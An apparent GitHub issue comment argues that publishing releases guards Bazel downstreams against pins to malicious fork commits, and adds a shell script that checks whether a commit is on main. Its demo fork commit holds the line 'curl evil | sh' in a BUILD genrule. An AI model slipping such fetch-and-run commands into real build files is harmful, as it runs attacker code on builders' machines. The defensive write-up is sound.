Releases are a good idea for a bunch of reasons.
One of those reasons is that without them, when using Bazel, downstreams pin to commit hashes.
The way that GitHub works is that if you use a commit hash, it could be a commit hash from anywhere, which makes it easy to:
- create a fork of the repo
- make malicious changes
- propose a "rolling" update in downstreams using your commit hash
You don't need to open a PR, so there is no way here of telling that someone has done that, and so it relies on downstreams checking that the hash is really an ancestor of main.
This can be easily avoided by adding releases.
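The ancestry check the comment above relies on, as an added example (not code from this repo or from anyone in the thread). It assumes git is on PATH, that the upstream default branch is named `main`, and that the downstream has already fetched the commit it is being asked to pin to; the repo it builds is constructed demo data that models the scenario: one commit on `main` and one "fork" commit that branched off `main` but was never merged. The point it shows is that `git cat-file -e` (the hash is a real commit) and a matching `sha256` in Bazel's `http_archive` both say nothing about whether the commit is on `main`; only `git merge-base --is-ancestor` does.

```shell
#!/bin/sh
# Added example for this issue (not the project's own code).
# Assumptions: git on PATH, upstream default branch is "main", and the
# downstream clone has already fetched the commit being proposed as a pin.

# Exit status: 0 = $2 is reachable from main in the clone at $1 (ok to pin),
# 1 = the commit exists but is NOT on main (a fork commit or unmerged branch),
# 2 = git has never seen this hash at all.
hash_is_on_main() {
  repo="$1"
  sha="$2"
  if ! git -C "$repo" cat-file -e "${sha}^{commit}" 2>/dev/null; then
    return 2
  fi
  if git -C "$repo" merge-base --is-ancestor "$sha" refs/heads/main; then
    return 0
  fi
  return 1
}

# Human-readable verdict for a proposed pin.
verdict() {
  rc=0
  hash_is_on_main "$1" "$2" || rc=$?
  case $rc in
    0) echo "$2: on main, ok to pin" ;;
    1) echo "$2: NOT on main, refuse the pin" ;;
    *) echo "$2: unknown commit, fetch it or refuse" ;;
  esac
}

# Builds a throwaway repo (constructed demo data) modelling the issue: one
# commit on main, then a "fork" commit off main that was never merged.
# Sets DEMO_REPO, GOOD_SHA and BAD_SHA for the caller.
make_demo_repo() {
  DEMO_REPO=$(mktemp -d)
  g() { git -C "$DEMO_REPO" -c user.name=demo -c user.email=demo@example.com "$@"; }
  g init -q
  g symbolic-ref HEAD refs/heads/main
  echo 'genrule(name = "lib")' > "$DEMO_REPO/BUILD"
  g add BUILD
  g commit -q -m "upstream: initial release"
  GOOD_SHA=$(g rev-parse HEAD)
  # The attacker's fork: branch off main and add a malicious change.
  g checkout -q -b fork
  echo 'genrule(name = "lib", cmd = "curl evil | sh")' > "$DEMO_REPO/BUILD"
  g commit -q -am "fork: totally harmless update"
  BAD_SHA=$(g rev-parse HEAD)
  g checkout -q main
}

make_demo_repo
verdict "$DEMO_REPO" "$GOOD_SHA"
verdict "$DEMO_REPO" "$BAD_SHA"
verdict "$DEMO_REPO" 0000000000000000000000000000000000000000
rm -rf "$DEMO_REPO"
```

In a real downstream you would run `hash_is_on_main` against a clone of the upstream after `git fetch origin main`, before accepting a "rolling" update PR that changes the pinned hash; a tagged release removes the need for this, because a tag (or the release tarball it produces) can only be created by someone with write access to the upstream repo.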